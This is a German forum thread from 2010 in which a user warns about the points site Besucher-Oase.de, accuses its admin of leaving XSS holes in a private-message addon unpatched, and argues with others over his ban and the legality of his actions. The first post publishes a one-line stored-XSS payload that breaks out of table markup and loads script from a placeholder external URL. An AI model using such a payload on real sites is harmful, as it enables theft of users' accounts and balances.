Alt 08.11.2010, 16:17:00   #1 (permalink)
Erfahrener Benutzer

ID: 360281
Lose-Remote

Drakor eine Nachricht über ICQ schicken
Reg: 31.07.2009
Beiträge: 139
Drakor wird schon bald berühmt werdenDrakor wird schon bald berühmt werden
Standard [Gelöst]Warnung vor Besucher-Oase.de

Hallo,

nun, ich möchte hiermit alle Klammer ausdrücklich vor der dubiosen Loseseite: "Besucher-Oase.de" warnen, welche von einem User Namens SonneDeluxe betrieben wird.

Zwischen mir und ihm gab es folgenden Zwischenfall:

Ich hatte ein paar XSS-Lücken auf der Seite entdeckt (ein paar ist gut, die Seite war übersäht damit ) und habe sie ihm unverzüglich per PN gemeldet.
Nicht lange danach torkelte eine komplett in Kleinbuchstaben und ohne Interpunktion verfasste PN (die sehr kompetent wirkte xD) ein, die mir erklärte, er würde sich darum kümmern.
Etwa eine Woche später fragte ich nach(die Lücken wurden offensichtlich noch nicht geschlossen), ich argumentierte, dass es jedem User möglich sei, sämtliche Lose und den Account aller anderen User (einschließlich seinem Admin) durch diverse Lücken zu stehlen, ich schrieb ihm während eines Gespräches sogar einen einfachen Zweizeiler, der das Problem behoben hätte.
Die Antwort: Es würde demnächst ein FWX Update gemacht werden, das dann die Lücken wie er so dachte schließen würde. (Natürlich totaler Schwachsinn, die XSS-Lücken waren/sind in den Addons, am gefährlichsten die im PN-Addon).


Ich lag ihm daraufhin ab und an immer wieder auf den Ohren, ohne Reaktion. Zwischendrin informierte ich in meiner Verzweifelung sogar ein paar Usern, denen ich, auf Anfrage, erfolgreich einen solchen Loseklau demonstrieren konnte, ja ich schrieb sogar einmal die Co-Admine an. Immernoch ohne Gegenmaßnahme auf Lücken.
Ich weiß nicht, wieviele Wochen das ging, zumindest stellte ich Heute fest, dass diese Lücken "gutmütig" und mickrig behoben wurden. (Zur Information: Der intelligente Beheber ist hingegangen und hat " sowie ' maskiert)

Jeder Progger hier wird mir zustimmen, wenn ich sage, dass das einfach nur lächerlich ist und rein gar nichts behebt.
Nun, ich schrieb daraufhin eine sehr "fiese" PN, in der ich den Admin nochmals dazu aufforderte die Lücken zu schließen, seine User seien schließlich fahrlässig un Unkenntnis gelassen und immer in der Gefahr, bald keine Lose mehr zu besitzen.


Sodann kam eine Reaktion: Ich wurde gesperrt: "Verdacht auf Manipulation des Skriptes". Ebenfalls lächerlich, ich kann das Skript gar nicht manipulieren. Lieber Admin, ich kann es höchstens durch eigenen Code erweitern, doch ich habe NIEMALS deiner Seite damit geschadet.
Wenn ich es hätte wollen, würde die Seite wohl nicht mehr existieren.


Also meine Warnung: Haltet euch von solch inkompetenten und fahrlässigen Admins fern, nicht zuletzt auch von der Seite, wenn euch eure Lose lieb sind.


An den Admin,
ich werde hier ein Beispielskript veröffentlichen und dich endgültig dazu zwingen diese Lücken zu beheben, außerdem fordere ich sämtliche Lose von dir zurück, inklusive der in den Anteilen investierten! Ich werde andernfalls andere Wege einschlagen um diese Lose zurückzubekommen.

Achja, das Skriptbeispiel (für Pn's in diesem Fall):
Zitat:
</td>/tr><script src=http://deineurl.de/skript.js></script>

Gruß
Drakor

Ps: Eure Meinung würde ich dazu auch ganz gerne einmal hören, ich denke, ich bin im Recht.

Geändert von Drakor (09.11.2010 um 20:44:15 Uhr)
Drakor ist offline   Mit Zitat antworten
Gesponsorte Links
Alt 08.11.2010, 18:20:11   #2 (permalink)
Benutzer

ID: 283242
Lose-Remote

Reg: 22.12.2007
Beiträge: 97
frogger1978 frogger1978 frogger1978 frogger1978 frogger1978 frogger1978 frogger1978 frogger1978
Standard

also ganz erlich, ich weiß nich wass du meinst. ich bin ja schon nen paar tage bei besucher-oase und ich hab bissher nichts in der sb oder per pn lesen können das die seite lücken/fehlerhaft ist. vielleicht tust du das auch mal für leihen schreiben die vom proggen nix ahnung haben!
in dem sinne gruss frosch
frogger1978 ist offline   Mit Zitat antworten
Alt 08.11.2010, 18:29:16   #3 (permalink)
Erfahrener Benutzer

ID: 296929
Lose-Remote

Reg: 25.12.2007
Beiträge: 341
Dacuser wird schon bald berühmt werden
Standard

Er meint damit das man mittels einer PN wo man was bestimmrtes reinschreibt jeden User um seine Lose bringen kann.
Dacuser ist offline   Mit Zitat antworten
Alt 08.11.2010, 18:34:00   #4 (permalink)
Erfahrener Benutzer
Benutzerbild von Pr3DaTh0r

ID: 377928
Lose-Remote
Reallife

Reg: 04.02.2010
Beiträge: 326
Pr3DaTh0r ist einfach richtig nettPr3DaTh0r ist einfach richtig nettPr3DaTh0r ist einfach richtig nettPr3DaTh0r ist einfach richtig nett
Standard

Ich würde gern den Wahrheitsgehalt der Aussage von Drakor nachvollziehen / prüfen können. Wenn die Anschuldigungen wahr sind , dann ist der Admin ganz schön dreist so mit einem "Gönner" der Seite umzuspringen.

Als Absoluter Laie auf dem Gebiet der Programmierung kann ich die Anschuldigungen nicht Nachvollziehen , hoffe aber das sich fähige Leute hierzu mal äussern ob das Script der Seite tatsächlich so Schrottig ist.

Selbst auf die Gefahr hin das es nur falscher Alarm ist , würde ich gerne meine Lose erstmal in Sicherheit bringen , dies wird aber durch die AZ-Grenze von 20 Millionen verhindert. Gibts denn da keinen "Klamm-TÜV" oder sowas ?

An Stelle des Admins hätt ich Drakor als Söldner engagiert um die Lücken wenigstens Erstmal schliessen zu lassen , anstatt direkt zu Sperren (Welches in meinen Augen die total falsche Art ist mit Usern umzugehen, Sperren sollte man nur bei Absolutem Fehlverhalten wie Spam , Beleidigung etc. aber doch nicht bei sowas)

Ich hoffe der Admin und sein Co äussern sich auch mal hierzu , am besten mit Screenshots damit man auch mal was "sieht" und es nicht zu Anschuldigung gegen Anschuldigung kommt.


PS: Wer Fehler findet darf sie behalten.
Pr3DaTh0r ist offline   Mit Zitat antworten
Alt 08.11.2010, 18:52:44   #5 (permalink)
Übertreibt!
Benutzerbild von gadon

ID: 54655
Lose-Remote

gadon eine Nachricht über ICQ schicken gadon eine Nachricht über Skype™ schicken
Reg: 16.11.2007
Beiträge: 637
gadon kann auf vieles stolz seingadon kann auf vieles stolz seingadon kann auf vieles stolz seingadon kann auf vieles stolz seingadon kann auf vieles stolz seingadon kann auf vieles stolz seingadon kann auf vieles stolz seingadon kann auf vieles stolz seingadon kann auf vieles stolz sein
Standard

Normalerweise lese ich hier nur aber ich möchte in diesem Fall mal eine Ausnahme machen. Die Sicherheitslücken die Drakor entdeckt hat sind normalerweise jedem Programmierer bekannt bzw. sollten es sein.

Ich versuch es mal einfach zu erklären, XXS-Lücken bieten "Angreifern" die Möglichkeit schädlichen code auf die Webseite ein zu schleusen, in dem sie ihren "Schadcode" einfach in die Eingabefelder eingeben, zB. über Privatnachrichten, das ganze kann damit enden das Usernamen, Passwörter etc. ausgelesen werden.

http://de.wikipedia.org/wiki/Cross-Site_Scripting
gadon ist offline   Mit Zitat antworten
Alt 08.11.2010, 18:54:44   #6 (permalink)
Klammfriend_Nr1

ID: 154788
Lose-Remote

Reg: 01.02.2007
Beiträge: 59
ukgumo wird schon bald berühmt werdenukgumo wird schon bald berühmt werden
Daumen hoch

Was soll ich zu den Vorwürfen sagen? Ich habe den Betreiber der Oase als Ref meiner damaligen Seite Klamm-Friends kennen gelernt. Die Oase gabs da noch gar nicht. Er war noch nicht einmal mein Ref sondern der meines Partners und hat sich an mich gewandt. Aus diesem Kontakt entstand eine Idee und letztendlich Sonees Oase. Die Oase entstand aus vollem Eifer und Energie und hat Hand und Fuss. Jeder der das Gegenteil behaupten will muss mir Rede und Antwort stehen. Admins sind auch nur Menschen mit Real-Live. Nur schade das einige mit so blödsinnigen Threads versuchen Seiten kaputt zu machen. Sonee und ich haben eins gemeinsam: Wir gestalten unsere Seiten nicht nach uns sondern wie Ihr sie wollt... Also lasst das fiese Gemecker!!!
ukgumo ist offline   Mit Zitat antworten
Alt 08.11.2010, 18:56:44   #7 (permalink)
Erfahrener Benutzer

ID: 296929
Lose-Remote

Reg: 25.12.2007
Beiträge: 341
Dacuser wird schon bald berühmt werden
Standard

Wenn so ist dann soll Sonne mal antworten ob der fehler nun behoben ist oder nicht. Weil das es funktioniert hatt ist eine Tatsache
Dacuser ist offline   Mit Zitat antworten
Alt 08.11.2010, 18:57:14   #8 (permalink)
Erfahrener Benutzer
Benutzerbild von Pr3DaTh0r

ID: 377928
Lose-Remote
Reallife

Reg: 04.02.2010
Beiträge: 326
Pr3DaTh0r ist einfach richtig nettPr3DaTh0r ist einfach richtig nettPr3DaTh0r ist einfach richtig nettPr3DaTh0r ist einfach richtig nett
Standard

Zitat:
Zitat von gadon Beitrag anzeigen
Normalerweise lese ich hier nur aber ich möchte in diesem Fall mal eine Ausnahme machen. Die Sicherheitslücken die Drakor entdeckt hat sind normalerweise jedem Programmierer bekannt bzw. sollten es sein.

Ich versuch es mal einfach zu erklären, XXS-Lücken bieten "Angreifern" die Möglichkeit schädlichen code auf die Webseite ein zu schleusen, in dem sie ihren "Schadcode" einfach in die Eingabefelder eingeben, zB. über Privatnachrichten, das ganze kann damit enden das Usernamen, Passwörter etc. ausgelesen werden.

http://de.wikipedia.org/wiki/Cross-Site_Scripting

Danke für die Erklärung , mich würde jetzt Interessieren : Sind diese Lücken auf der Oase ebenfalls vorhanden ? Kann das bestätigt werden ?
Pr3DaTh0r ist offline   Mit Zitat antworten
Alt 08.11.2010, 18:58:02   #9 (permalink)
Erfahrener Benutzer

ID: 296929
Lose-Remote

Reg: 25.12.2007
Beiträge: 341
Dacuser wird schon bald berühmt werden
Standard

Zitat:
Zitat von Pr3DaTh0r Beitrag anzeigen
Danke für die Erklärung , mich würde jetzt Interessieren : Sind diese Lücken auf der Oase ebenfalls vorhanden ? Kann das bestätigt werden ?
Wenn nichts gemacht wurde sind diese Lücken noch vorhanden.
Dacuser ist offline   Mit Zitat antworten
Alt 08.11.2010, 19:02:15   #10 (permalink)
Besucher-Oase.de
Benutzerbild von SoneeDeluxe

Reg: 05.12.2009
Beiträge: 496
SoneeDeluxe ist einfach richtig nettSoneeDeluxe ist einfach richtig nettSoneeDeluxe ist einfach richtig nettSoneeDeluxe ist einfach richtig nett
Standard

Bleibt mal ganz ruhig ob sowas funktioniert oder nicht werden euch die jenigen schon erklären die vom FWX 2.3.6 ahnung haben,denn meine infos sind das dass FWX 2.3.6 sicher ist...
"„Kaum haste mal ein bisschen was,gibt es wen,
den ärgert das."
Werbung: Besucher-Oase | Slot-Casino | Casino99
SoneeDeluxe ist offline   Mit Zitat antworten
Alt 08.11.2010, 19:04:26   #11 (permalink)
Erfahrener Benutzer

ID: 296929
Lose-Remote

Reg: 25.12.2007
Beiträge: 341
Dacuser wird schon bald berühmt werden
Standard

Zitat:
Zitat von SoneeDeluxe Beitrag anzeigen
Bleibt mal ganz ruhig ob sowas funktioniert oder nicht werden euch die jenigen schon erklären die vom FWX 2.3.6 ahnung haben,denn meine infos sind das dass FWX 2.3.6 sicher ist...
Drakor hatt es doch geteste, und es hatt funktioniert. Also würde ich jetzt mal den hintern hoch bekommen und den fehler beseitigen
Dacuser ist offline   Mit Zitat antworten
Alt 08.11.2010, 19:23:13   #12 (permalink)
Erfahrener Benutzer

ID: 360281
Lose-Remote

Drakor eine Nachricht über ICQ schicken
Reg: 31.07.2009
Beiträge: 139
Drakor wird schon bald berühmt werdenDrakor wird schon bald berühmt werden
Standard

@Sonne: Ist schön dass du dich überhaupt meldest:
Der oder besser gesagt die Fehler haben absolut gar nichts mit dem FWX zu tun, sondern (teilweise)mit irgendwelchen Addons. Von daher kann jemand, der sich mit dem FWX auskennt, sooft beschwören, dass das neue FWX sicher ist, es wird keinerlei Auswirkungen haben.

@Pr3DaTh0r: Ich kann zu dem aktuellen Stand der Lücken keine qualifizierte Aussage abgeben, aber ca. 1h vor dem ersten Post waren sie eindeutig noch vorhanden, wie mein Pn-Postfach in der Oase belegen kann.

Desweitern ist Dacuser derjenige, der die Chance hatte sich mitanzusehen, wie einfach es sein konnte Lose anderer User zu stehlen.

Gruß
Drakor

Ps: @gadon: Danke für die Erklärung, aber du wirst erstaunt sein, dass es in der Klammwelt etwas anders ist, wenn es zu solchen Themen kommt. Ich habe eine Liste von mehreren Dutzend Seiten, bei denen es aus dem Stehgreif mindestens genauso gefährlich ist wie auf der Oase. Ich bin mir auch sicher, dass ich noch tausend andere finde, die immer und immer wieder dieselben Lücken haben.

Fakt ist, dass JEDE FWX-Seite, die entweder exakt dasselbe Pn-System und/oder dieselbe FWX-Version und/oder andere "gleiche" Addons hat, potenziell gefährdet ist. (Ich hab schon mit so manchen Webmastern gesprochen, die es behoben haben bzw. einmal sogar dabei waren es zu beheben ^^).

Geändert von Drakor (08.11.2010 um 19:32:45 Uhr)
Drakor ist offline Threadstarter   Mit Zitat antworten
Alt 08.11.2010, 19:34:46   #13 (permalink)
TopPromoter
Benutzerbild von ewin12000

ID: 48612
Lose-Remote

ewin12000 eine Nachricht über ICQ schicken ewin12000 eine Nachricht über MSN schicken ewin12000 eine Nachricht über Yahoo! schicken
Reg: 21.04.2006
Beiträge: 1.880
ewin12000 hat eine strahlende Zukunftewin12000 hat eine strahlende Zukunftewin12000 hat eine strahlende Zukunftewin12000 hat eine strahlende Zukunftewin12000 hat eine strahlende Zukunftewin12000 hat eine strahlende Zukunftewin12000 hat eine strahlende Zukunftewin12000 hat eine strahlende Zukunftewin12000 hat eine strahlende Zukunftewin12000 hat eine strahlende Zukunftewin12000 hat eine strahlende Zukunft
Standard

Zitat:
Zitat von Drakor Beitrag anzeigen
Ps: Eure Meinung würde ich dazu auch ganz gerne einmal hören, ich denke, ich bin im Recht.
Wie kommt man auf die Idee, in Eingabefelder, die den Zweck der Übermittlung von Textnachrichten haben, Scriptcodes einzugeben? Ich will dir ja nichts unterstellen, aber ich denke die Mehrzahl der Internetuser würde auf die Idee nicht kommen.
Und jetzt kommen wir zum Punkt und zwar unabhängig ob das Script sicher (was ist im Internet sicher?) bzw. sicher genug ist.
Meiner Auffassung nach, verstößt du gegen § 263 STGB oder zumindest gegen §202a STGB.

Geändert von ewin12000 (08.11.2010 um 20:10:41 Uhr)
ewin12000 ist offline   Mit Zitat antworten
Alt 08.11.2010, 19:51:11   #14 (permalink)
Erfahrener Benutzer
Benutzerbild von Pr3DaTh0r

ID: 377928
Lose-Remote
Reallife

Reg: 04.02.2010
Beiträge: 326
Pr3DaTh0r ist einfach richtig nettPr3DaTh0r ist einfach richtig nettPr3DaTh0r ist einfach richtig nettPr3DaTh0r ist einfach richtig nett
Standard

Zitat:
Zitat von ewin12000 Beitrag anzeigen
Wie kommt man auf die Idee, in Eingabefelder, die den Zweck der Übermittlung von Textnachrichten haben, Scriptcodes einzugeben? Ich will dir ja nichts unterstellen, aber ich denke die Mehrzahl der Internetuser würde auf die Idee nicht kommen.
Und jetzt kommen wir zum Punkt und zwar unabhängig ob das Script sicher (was ist im Internet sicher?) bzw. sicher genug ist.
Meiner Auffassung nach, verstößt du gegen § 263 STGB oder zumindest gegen §202 STGB.
Zu § 263 : Vermögensschaden ensteht nicht, da Er "nur" Klammlose damit klauen könnte. Und die haben , wie Wir alle wissen , keinen realen Gegenwert.

Zu § 202 : Er öffnet keine Briefe oder Ähnliches geschweige denn liest Er Teile des Scripts aus die codiert wären.

Bitte lasst die Paragrafenreiterei doch stecken , es gibt eh keine Instanz die zum derzeitigen Stand der Dinge ein Verfahren eröffnen würde. Seht lieber GEMEINSAM zu das die Klammwelt sicherer wird.
Pr3DaTh0r ist offline   Mit Zitat antworten
Alt 08.11.2010, 19:51:19   #15 (permalink)
Erfahrener Benutzer

ID: 360281
Lose-Remote

Drakor eine Nachricht über ICQ schicken
Reg: 31.07.2009
Beiträge: 139
Drakor wird schon bald berühmt werdenDrakor wird schon bald berühmt werden
Standard

Hallo ewin12000,

Nun, du zitierst einen Abschnitt des sogenannten Hackerparagraphen. Ich bin kein Jurist, aber ich kenne die Vergangenheit dieses Parapraphen, denn als er angewandt wurde gab es eine reihe von Selbstanzeigen von Datenschutzfirmen, oder Antivirenfirmen oder sogar (jetzt als Beispiel) vom ct-Chrefredakteur.

Wenn du es wünschst, kann ich mich natürlich ebenfalls selbst anzeigen, ich bin mir jedoch sicher, dass das Verfahren aus folgenden Gründen eingestellt wird:

- Einerseits Einstellung wegen Geringfügigkeit
- Andererseits Einstellung aufgrund der Tatsache, dass in der Vergangenheit ähnliche Fälle als nicht mit der Intention zum Computerbetrug/Daten ausspähen abgestempelt wurden.

Außerdem, ich bin ja auch zufällig darauf gestoßen und ich war es, der hingegangen ist und diesen Fehler gemeldet hat, ich habe darauf hin ja schließlich auch nichts weiter getan, außer auch auf Anfrage die Unsicherheit zu demonstrieren um zu soetwas verhindern.

Somit habe ich keine der für die Paragraphen notwendigen Intentionen erfüllt.

Andere Frage: Was wäre wenn niemand es melden/öffentlich machen würde ? Genau, es gäbe keine Loseseiten, da alle ausgeraubt worden wären und das nahezu perfekt und ohne Spuren und genau, es gäbe auch keine Antivirenfirmen, weil der Computer längst zugrunde gegangen wäre, da es zwar die Viren gibt, aber niemand (laut dem Gesetz) etwas dagegen machen darf.

Von daher möchte ich meine Aussage von oben nicht ändern =)

Gruß
Drakor

EDIT: Da war jemand schneller, aber Danke für die Paragraphen, auch wenn man die relativ schnell nachschauen kann.
Drakor ist offline Threadstarter   Mit Zitat antworten
Antwort

Gesponsorte Links
 

Anzeige


Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1)
 
Themen-Optionen
Ansicht

Forumregeln
Es ist Ihnen nicht erlaubt, neue Themen zu verfassen.
Es ist Ihnen nicht erlaubt, auf Beiträge zu antworten.
Es ist Ihnen nicht erlaubt, Anhänge hochzuladen.
Es ist Ihnen nicht erlaubt, Ihre Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks sind an
Pingbacks sind an
Refbacks sind an


Ähnliche Themen
Thema Autor Forum Antworten Letzter Beitrag
[S]Werber für Besucher-Oase.de mit DL orrrk Lose4Refs (erledigt) 8 11.07.2010 19:30:36
Komm zur Besucher-Oase.de smartys3 Suche Refs: Loseseiten 26 14.06.2010 23:07:26


Alle Zeitangaben in WEZ +1. Es ist jetzt 06:36:14 Uhr.